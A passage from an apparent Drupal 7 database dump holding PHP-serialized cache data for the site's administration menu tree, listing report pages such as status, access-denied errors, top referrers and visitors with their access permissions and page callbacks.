configuration\";}\";s:13:\"page_callback\";s:13:\"system_status\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:20:\"admin/reports/status\";s:5:\"title\";s:13:\"Status report\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:74:\"Get a status report about your site\'s operation and any detected problems.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:58;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"58\";s:4:\"plid\";s:2:\"19\";s:9:\"link_path\";s:27:\"admin/reports/access-denied\";s:11:\"router_path\";s:27:\"admin/reports/access-denied\";s:10:\"link_title\";s:26:\"Top \'access denied\' errors\";s:7:\"options\";s:85:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:35:\"View \'access denied\' errors (403s).\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:2:\"58\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:37:\"a:1:{i:0;s:19:\"access site reports\";}\";s:13:\"page_callback\";s:9:\"dblog_top\";s:14:\"page_arguments\";s:31:\"a:1:{i:0;s:13:\"access denied\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:27:\"admin/reports/access-denied\";s:5:\"title\";s:26:\"Top \'access denied\' errors\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:35:\"View \'access denied\' errors (403s).\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:59;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"59\";s:4:\"plid\";s:2:\"19\";s:9:\"link_path\";s:28:\"admin/reports/page-not-found\";s:11:\"router_path\";s:28:\"admin/reports/page-not-found\";s:10:\"link_title\";s:27:\"Top \'page not found\' errors\";s:7:\"options\";s:86:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:36:\"View \'page not found\' errors (404s).\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:2:\"59\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:37:\"a:1:{i:0;s:19:\"access site reports\";}\";s:13:\"page_callback\";s:9:\"dblog_top\";s:14:\"page_arguments\";s:32:\"a:1:{i:0;s:14:\"page not found\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:28:\"admin/reports/page-not-found\";s:5:\"title\";s:27:\"Top \'page not found\' errors\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:36:\"View \'page not found\' errors (404s).\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:100;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"100\";s:4:\"plid\";s:2:\"19\";s:9:\"link_path\";s:21:\"admin/reports/event/%\";s:11:\"router_path\";s:21:\"admin/reports/event/%\";s:10:\"link_title\";s:7:\"Details\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:3:\"100\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:12:\"a:1:{i:3;N;}\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:37:\"a:1:{i:0;s:19:\"access site reports\";}\";s:13:\"page_callback\";s:11:\"dblog_event\";s:14:\"page_arguments\";s:14:\"a:1:{i:0;i:3;}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:21:\"admin/reports/event/%\";s:5:\"title\";s:7:\"Details\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:192;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"192\";s:4:\"plid\";s:2:\"19\";s:9:\"link_path\";s:20:\"admin/reports/search\";s:11:\"router_path\";s:20:\"admin/reports/search\";s:10:\"link_title\";s:18:\"Top search phrases\";s:7:\"options\";s:83:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:33:\"View most popular search phrases.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:3:\"192\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:37:\"a:1:{i:0;s:19:\"access site reports\";}\";s:13:\"page_callback\";s:9:\"dblog_top\";s:14:\"page_arguments\";s:23:\"a:1:{i:0;s:6:\"search\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:20:\"admin/reports/search\";s:5:\"title\";s:18:\"Top search phrases\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:33:\"View most popular search phrases.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:260;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"260\";s:4:\"plid\";s:2:\"19\";s:9:\"link_path\";s:21:\"admin/reports/updates\";s:11:\"router_path\";s:21:\"admin/reports/updates\";s:10:\"link_title\";s:17:\"Available updates\";s:7:\"options\";s:132:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:82:\"Get a status report about available updates for your installed modules and themes.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-50\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:3:\"260\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:47:\"a:1:{i:0;s:29:\"administer site configuration\";}\";s:13:\"page_callback\";s:13:\"update_status\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:21:\"admin/reports/updates\";s:5:\"title\";s:17:\"Available updates\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:82:\"Get a status report about available updates for your installed modules and themes.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:352;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"352\";s:4:\"plid\";s:2:\"19\";s:9:\"link_path\";s:18:\"admin/reports/hits\";s:11:\"router_path\";s:18:\"admin/reports/hits\";s:10:\"link_title\";s:11:\"Recent hits\";s:7:\"options\";s:93:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:43:\"View pages that have recently been visited.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:3:\"352\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:35:\"a:1:{i:0;s:17:\"access statistics\";}\";s:13:\"page_callback\";s:22:\"statistics_recent_hits\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:18:\"admin/reports/hits\";s:5:\"title\";s:11:\"Recent hits\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:43:\"View pages that have recently been visited.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:353;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"353\";s:4:\"plid\";s:2:\"19\";s:9:\"link_path\";s:19:\"admin/reports/pages\";s:11:\"router_path\";s:19:\"admin/reports/pages\";s:10:\"link_title\";s:9:\"Top pages\";s:7:\"options\";s:91:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:41:\"View pages that have been hit frequently.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"1\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:3:\"353\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:35:\"a:1:{i:0;s:17:\"access statistics\";}\";s:13:\"page_callback\";s:20:\"statistics_top_pages\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:19:\"admin/reports/pages\";s:5:\"title\";s:9:\"Top pages\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:41:\"View pages that have been hit frequently.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:354;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"354\";s:4:\"plid\";s:2:\"19\";s:9:\"link_path\";s:23:\"admin/reports/referrers\";s:11:\"router_path\";s:23:\"admin/reports/referrers\";s:10:\"link_title\";s:13:\"Top referrers\";s:7:\"options\";s:69:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:19:\"View top referrers.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:3:\"354\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:35:\"a:1:{i:0;s:17:\"access statistics\";}\";s:13:\"page_callback\";s:24:\"statistics_top_referrers\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:23:\"admin/reports/referrers\";s:5:\"title\";s:13:\"Top referrers\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:19:\"View top referrers.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:355;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"355\";s:4:\"plid\";s:2:\"19\";s:9:\"link_path\";s:22:\"admin/reports/visitors\";s:11:\"router_path\";s:22:\"admin/reports/visitors\";s:10:\"link_title\";s:12:\"Top visitors\";s:7:\"options\";s:84:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:34:\"View visitors that hit many pages.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"2\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:3:\"355\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:35:\"a:1:{i:0;s:17:\"access statistics\";}\";s:13:\"page_callback\";s:23:\"statistics_top_visitors\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:22:\"admin/reports/visitors\";s:5:\"title\";s:12:\"Top visitors\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:34:\"View visitors that hit many pages.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:358;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"358\";s:4:\"plid\";s:2:\"19\";s:9:\"link_path\";s:22:\"admin/reports/access/%\";s:11:\"router_path\";s:22:\"admin/reports/access/%\";s:10:\"link_title\";s:7:\"Details\";s:7:\"options\";s:66:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:16:\"View access log.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:3:\"358\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:12:\"a:1:{i:3;N;}\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:35:\"a:1:{i:0;s:17:\"access statistics\";}\";s:13:\"page_callback\";s:21:\"statistics_access_log\";s:14:\"page_arguments\";s:14:\"a:1:{i:0;i:3;}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:22:\"admin/reports/access/%\";s:5:\"title\";s:7:\"Details\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:16:\"View access log.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}}}i:21;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"21\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:15:\"admin/structure\";s:11:\"router_path\";s:15:\"admin/structure\";s:10:\"link_title\";s:9:\"Structure\";s:7:\"options\";s:95:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:45:\"Administer blocks, content types, menus, etc.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:2:\"-8\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"21\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:28:\"system_admin_menu_block_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:15:\"admin/structure\";s:5:\"title\";s:9:\"Structure\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:45:\"Administer blocks, content types, menus, etc.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:22;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"22\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:11:\"admin/tasks\";s:11:\"router_path\";s:11:\"admin/tasks\";s:10:\"link_title\";s:5:\"Tasks\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:2:\"-1\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-20\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"22\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:28:\"system_admin_menu_block_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:5:\"admin\";s:8:\"tab_root\";s:5:\"admin\";s:5:\"title\";s:5:\"Tasks\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"140\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}}}}s:10:\"node_links\";a:0:{}}',0,1423659033,1),('links:management:tree-data:en:2f2885bd137a3198cfb1b8c32c364cc326c0ef3780a3c869120453a061888ca5','a:2:{s:4:\"tree\";a:1:{i:1;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:1:\"1\";s:4:\"plid\";s:1:\"0\";s:9:\"link_path\";s:5:\"admin\";s:11:\"router_path\";s:5:\"admin\";s:10:\"link_title\";s:14:\"Administration\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"9\";s:5:\"depth\";s:1:\"1\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"0\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:28:\"system_admin_menu_block_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:5:\"admin\";s:5:\"title\";s:14:\"Administration\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:1;}s:5:\"below\";a:11:{i:7;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:1:\"7\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:16:\"admin/appearance\";s:11:\"router_path\";s:16:\"admin/appearance\";s:10:\"link_title\";s:10:\"Appearance\";s:7:\"options\";s:83:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:33:\"Select and configure your themes.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:2:\"-6\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"7\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:35:\"a:1:{i:0;s:17:\"administer themes\";}\";s:13:\"page_callback\";s:18:\"system_themes_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:16:\"admin/appearance\";s:5:\"title\";s:10:\"Appearance\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:33:\"Select and configure your themes.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:8;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:1:\"8\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:12:\"admin/config\";s:11:\"router_path\";s:12:\"admin/config\";s:10:\"link_title\";s:13:\"Configuration\";s:7:\"options\";s:70:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:20:\"Administer 